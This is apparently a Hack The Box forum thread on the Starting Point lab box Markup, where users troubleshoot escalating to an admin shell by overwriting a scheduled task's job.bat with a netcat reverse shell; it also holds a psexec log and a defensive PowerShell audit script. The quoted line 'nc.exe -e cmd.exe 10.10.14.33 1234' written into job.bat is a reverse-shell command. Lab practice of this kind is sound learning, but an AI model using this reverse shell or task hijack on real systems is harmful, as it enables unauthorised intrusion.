Starting Point: Markup, job.bat and getting the admin shell

Hi everyone! It’s me again :slight_smile: I’ve been stuck on Markup for weeks at this point, trying to get the last step.

The method

  1. I upload the renamed nc executable to daniel’s account.
  2. I write to job.bat
    [screenshot: Running the commands]
  3. I get a regular user shell on the port I listen on.
  4. I exit the regular shell, using something like Ctrl+C or Ctrl+D
  5. I try running the command again (writing to job.bat), and I get the error message that the process is already in use. (The screenshot shows PowerShell, but do note that for regular cmd the error message has a similar meaning - process is in use)
    [screenshot: Error message]
    You will also note that I have tried both 32 and 64 bit versions of the executable.
  6. I can’t use my executable anymore with any port - new or old. Deleting the nc.exe (pancake-nc.exe) and reuploading it still produces the same error message. As daniel, I do not have the privileges to access the running job list and physically kill all instances of my nc.
  7. I wait until the machines get reset and then I get another shot at it.

The research

So, I do monitor Starting Point for new questions, and these two caught my eye:

[screenshot: The question(s)]

So, as far as I have understood, I just need to wait for the job to run to get an admin shell, it runs about every 30 seconds. But, there is the following that I do not understand:

  1. Is it the existing shell that gets upgraded or do I need to run the job at the right timing to get an admin shell instead of a regular daniel shell?
  2. If it’s the latter, how do I know when to run, given I only get one shot at it?
  3. If anyone knows any alternative ways how I can kill my own running jobs in this box, please let me know! The waiting until machines get reset and not being able to do anything is very frustrating!

Thank you in advance :slight_smile:

Hello world

I’m blocked on the last action, the upload doesn’t work properly :frowning:

How can I solve this?

====================================================

kali@kali:~/impacket/examples$ ./psexec.py administrator@10.10.10.27
Impacket v0.9.22.dev1+20200513.101403.9a4b3f52 - Copyright 2020 SecureAuth Corporation

Password:
Requesting shares on 10.10.10.27…
Found writable share ADMIN$
[*] Uploading file UgmBhFGY.exe
[-] Error uploading file UgmBhFGY.exe, aborting…
[-] Error performing the installation, cleaning up: [Errno 32] Broken pipe

=======================================================

Best regards

@Ak47S0un Hello! While I am very happy that you are asking questions, please don’t hijack other people’s threads with your issue, stick to relevant discussions - your issue is with Archetype, the first Starting Point box (yes, there will be more to come after you solve this one :slight_smile: ), so please do post only in threads that discuss it. Also, I have noticed you have already created a topic with your issue. This will help keep discussions relevant.

@tasidonya I just rooted this box by using a Windows version of netcat rather than just copying netcat from my Kali box. I downloaded the file from netcat 1.11 for Win32/Win64 and then followed the guide…worked perfectly for me.
P.S. Thanks for your post on puttygen that helped me a lot!


@quinnlaup Thank you for replying :slight_smile: I will give this a try!
P.S. Glad I could help! :slight_smile:

Progress update, no solution.

(Please excuse command screenshots, HTB didn’t like my plaintext commands, so I did it this way instead)

First of all, to address my “one executable - one attempt” question (question 3 in the original post):
To be able to reuse the same port and same executable press Ctrl+C in your listener tab, not the opened daniel shell with the pipe to job.bat. This way the > job.bat command will terminate itself and no issues with running processes should occur.

So I have followed @quinnlaup’s advice and downloaded a fresh zip file of nc for Windows. This time I have decided to work from the Temp directory.
C:\Users\daniel\AppData\Local\Temp\tasidonya
I have uploaded the nc.exe there. I know it’s a functioning executable because when I ran

[screenshot: Regular nc command]

I got a regular shell in my listener tab. I decided to work from PowerShell because I prefer it to regular cmd.

So, first, I tried to run the command from the walkthrough without alterations:

[screenshot: Same command into job.bat]

(okay, there was a small alteration that the screenshot does not show, that is .\nc.exe instead of nc.exe because I am in PowerShell)
Every time I ran this command I instantly got a regular daniel shell on my listener tab. I have tried many times, with stopwatch and without to time the intervals at which the job.bat gets written to.

But then, since the purpose of this command is merely to write to a bat file, not to open a shell straight away, I decided to tweak this command slightly:

[screenshot: tweaked command]
(The tweak consists of surrounding the nc command by single quotation marks, so it becomes a string and doesn’t get executed)

So, this command, according to my assumptions, should have created a connection, piping whether a command succeeded or failed to a log file in my temp dir. The contents of C:\Log-Management\job.bat (obtained via type C:\Log-Management\job.bat) at this point was:

[screenshot: contents of job.bat]

I do not know if it will work without a bat file, because when I did try to run it, I have rather carelessly left a new line in there, which has caused chaos in my shell.

After this command did not work, I tried to alter the command slightly again, but this one I did try outside the bat file, and it worked on its own:

[screenshot: altered command]

but inside job.bat I have timed it and the job ran, but I didn’t get back my 1 in the listener tab (I did make sure it was running and was listening on the right port). So now I am stuck. Either I did not get the purpose of the writing to job.bat command correctly or I am missing something.

Hello! I won’t give the answer, you are almost there…
My advice is that you search what a job is. In Linux or OSX, it is called cronjob. After that you’ll understand what you have to do. You might need to learn how to write one…


Thank you thank you thank you, you have no idea how much time I wasted trying to get netcat to work on the box until I read this post :sweat_smile: worked straight away with those files from your link

Hello, sorry if I jump in, but I’m still trying to get my reverse shell with admin rights working.
If I run both nc.exe and nc64.exe I get a working reverse shell but with daniel’s privileges.
From what I have seen, it seems there is no task job scheduled to run the job.bat file as administrator, so that’s why it doesn’t run.
I can’t create a new task as administrator just because I don’t have its password, I’m struggling with it with no luck, any hint?
Thanks in advance.
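A defender’s audit for the misconfiguration this thread circles around (a privileged scheduled task that runs a script a low-privilege user can overwrite), added here as example code, not something from the thread or from HTB: it lists every scheduled task whose executable, or the script named in its arguments, grants write access to Users, Everyone or Authenticated Users. It assumes it runs elevated on the host being audited; the function name and the group list are my own choices.

```powershell
# Added audit example (not from the thread). Run elevated on the host you are
# checking: an unprivileged user cannot read every task or every ACL.
function Find-WritableTaskScript {
    $writeRights = [System.Security.AccessControl.FileSystemRights]::Write -bor
                   [System.Security.AccessControl.FileSystemRights]::Modify -bor
                   [System.Security.AccessControl.FileSystemRights]::FullControl
    # Principals that should never be able to change what a privileged task runs
    $lowPrivGroups = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users')

    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute).Trim('"')
            $candidates = @($exe)
            # "cmd.exe /c C:\something\job.bat": the script in the arguments is what really runs
            if ($action.Arguments) {
                $candidates += [regex]::Matches($action.Arguments, '[A-Za-z]:\\[^"\s]+') |
                    ForEach-Object { $_.Value }
            }
            foreach ($path in $candidates) {
                if (-not (Test-Path -LiteralPath $path -PathType Leaf)) { continue }
                $acl  = Get-Acl -LiteralPath $path
                $weak = $acl.Access | Where-Object {
                    $_.AccessControlType -eq 'Allow' -and
                    $lowPrivGroups -contains $_.IdentityReference.Value -and
                    ($_.FileSystemRights -band $writeRights)
                }
                if ($weak) {
                    [pscustomobject]@{
                        Task       = $task.TaskPath + $task.TaskName
                        RunsAs     = $task.Principal.UserId
                        File       = $path
                        WritableBy = (@($weak.IdentityReference.Value) | Select-Object -Unique) -join ', '
                    }
                }
            }
        }
    }
}

Find-WritableTaskScript | Format-Table -AutoSize
```

Any row whose RunsAs is an administrator or SYSTEM and whose WritableBy is non-empty is the Markup pattern: fix it by restricting write access on that file (and its directory) to Administrators and SYSTEM, or by pointing the task at a protected copy.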

Just a reminder, don’t rely on the walk-through only.
The guide didn’t work for me but found another way using the winpeas script :wink:

This worked, legend.

One thing I found out that nc64.exe did not work on the remote machine. I did not make a screenshot, but the error message was like “wrong version of windows for running the program nc64.exe”.

I tried using nc.exe (i.e., 32 bit) and it worked.

nc.exe/nc.exe at master · int0x33/nc.exe (github.com)

Thanks, mate, that was a great pointer. I downloaded that version of netcat and transferred it to the box, and it worked straight away. I tried it again with the nc64.exe version, and it still didn’t work so I think that was the issue.

Hello mates.

job.bat is overwritten but some time later it comes back to its original state, so the exploit doesn’t work.

Does someone know what is happening? Thank you in advance.

Note: in PS I can see the command history of other users and maybe the machine creators.

echo "C:\Users\daniel\nc.exe -e cmd.exe 10.10.14.33 1234" > .\job.bat

$cred = New-Object System.Management.Automation.PSCredential ("daniel",$pass)

Start-Process -NoNewWindow -FilePath "C:\xampp\xampp_start.exe" -Credential $cred -WorkingDirectory c:\users\daniel\documents

move nc.exe C:\USERS\daniel\nc.exe